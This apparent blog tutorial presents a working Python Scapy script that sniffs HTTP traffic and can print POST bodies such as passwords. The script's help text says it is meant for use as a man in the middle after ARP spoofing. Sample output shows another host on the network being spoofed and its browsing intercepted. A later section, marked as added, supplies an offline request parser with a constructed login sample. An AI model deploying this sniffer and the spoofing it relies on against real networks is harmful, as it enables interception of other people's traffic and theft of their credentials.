For a network security engineer, monitoring the network is always a useful task: it lets them see what is happening on the network and view and control malicious traffic. In this tutorial you will learn how to sniff HTTP packets.
We will again use scapy to do the sniffing. Once an HTTP request is detected, we extract some information from it and print it out. Easy enough? Let's get started.
Scapy 2.4.3+ supports HTTP packets by default. Let's install the requirements for this tutorial:
pip3 install scapy colorama
We only need colorama here to make the printed HTTP packets look nicer.

from scapy.all import *
from scapy.layers.http import HTTPRequest  # import HTTP packet
from colorama import init, Fore

# initialize colorama
init()

# define colors
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET

# whether to print POST raw data; overridden by --show-raw when run as a script
show_raw = False


def sniff_packets(iface=None):
    """
    Sniff 80 port packets with `iface`, if None (default), then the
    Scapy's default interface is used
    """
    if iface:
        # port 80 for http (generally)
        # `process_packet` is the callback
        sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
    else:
        # sniff with default interface
        sniff(filter="port 80", prn=process_packet, store=False)


def process_packet(packet):
    """
    This function is executed whenever a packet is sniffed
    """
    if packet.haslayer(HTTPRequest):
        # if this packet is an HTTP Request
        # get the requested URL (Host is None when the header is absent, e.g. HTTP/1.0)
        host = packet[HTTPRequest].Host or b""
        url = host.decode() + packet[HTTPRequest].Path.decode()
        # get the requester's IP Address
        ip = packet[IP].src
        # get the request method
        method = packet[HTTPRequest].Method.decode()
        print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
        if show_raw and packet.haslayer(Raw) and method == "POST":
            # if show_raw flag is enabled, has raw data, and the requested method is "POST"
            # then show raw
            print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")


if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(
        description="HTTP Packet Sniffer, this is useful when you're a man in the middle. "
        + "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
    parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
    parser.add_argument("--show-raw", dest="show_raw", action="store_true",
                        help="Whether to print POST raw data, such as passwords, search queries, etc.")
    # parse arguments
    args = parser.parse_args()
    iface = args.iface
    show_raw = args.show_raw
    sniff_packets(iface)
[+] 192.168.1.105 Requested bfw.wiki/ with GET
[+] 192.168.1.105 Requested www.bfw.wiki/ with GET
At this point we are spoofing "192.168.1.100", claiming to be the router, so any packet going to or coming from the target machine flows to us first and only then to the router.
Now, let's try running the http_filter.py script again:
root@bfw:~/pythonscripts# python3 http_sniffer.py -i wlan0 --show-raw
[+] 192.168.1.100 Requested bfw.wiki/ with GET
[+] 192.168.1.100 Requested www.bfw.wiki/ with GET
[+] 192.168.1.100 Requested www.taobao.com/ with GET
[+] 192.168.1.100 Requested www.taobao.com/index/ with GET
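To exercise the same extraction logic offline, without root, Scapy or a live interface, here is an added pure-Python parser (not from the original post or from Scapy) that pulls Method, Host and Path out of a raw TCP payload the way the HTTPRequest layer does, returns None for anything on port 80 that is not a complete HTTP request head (TLS records, responses, a segment cut before the blank line), and lists which form field names a cleartext POST exposes; the METHODS set, the HttpRequest class and all sample payloads are constructed for this example.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qs
METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"PATCH"}  # assumed set

@dataclass
class HttpRequest:
    method: str
    host: str   # "" when no Host header is present (e.g. HTTP/1.0 clients)
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""   # may be truncated when the body spans TCP segments

def parse_http_request(payload: bytes) -> Optional[HttpRequest]:
    """Parse one HTTP/1.x request head from a TCP segment payload; None for TLS
    records, responses, a segment cut before the blank line, or other non-HTTP bytes."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or parts[0] not in METHODS or not parts[2].startswith(b"HTTP/1."):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if colon:   # skip malformed header lines rather than failing the parse
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return HttpRequest(parts[0].decode("ascii"), headers.get("host", ""),
                       parts[1].decode("latin-1"), headers, body)

def summarize(payload: bytes) -> Optional[str]:
    """The same summary the Scapy script prints, or None if not an HTTP request."""
    req = parse_http_request(payload)
    return None if req is None else f"{req.method} {req.host}{req.path}"

def cleartext_form_fields(req: HttpRequest) -> List[str]:
    """Field names (not values) of a urlencoded POST body: what leaves the client
    in clear over port 80 and what --show-raw would print."""
    ctype = req.headers.get("content-type", "")
    if req.method != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    return sorted(parse_qs(req.body.decode("latin-1"), keep_blank_values=True))

# Constructed sample payloads (not captured traffic)
GET_SAMPLE = b"GET / HTTP/1.1\r\nHost: www.bfw.wiki\r\n\r\n"
POST_SAMPLE = (b"POST /login HTTP/1.1\r\nHost: login.example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n"
               b"Content-Length: 27\r\n\r\nuser=alice&password=hunter2")
TLS_SAMPLE = b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x03"  # start of a TLS record, not HTTP
PARTIAL_SAMPLE = b"GET /index/ HTTP/1.1\r\nHost: www.taobao.com\r\n"  # cut before the blank line
```

Feeding it the payload of each sniffed segment (for example `bytes(packet[Raw].load)`) gives the same summary as the script, while the None cases show why a port-80 filter alone does not mean every packet is HTTP.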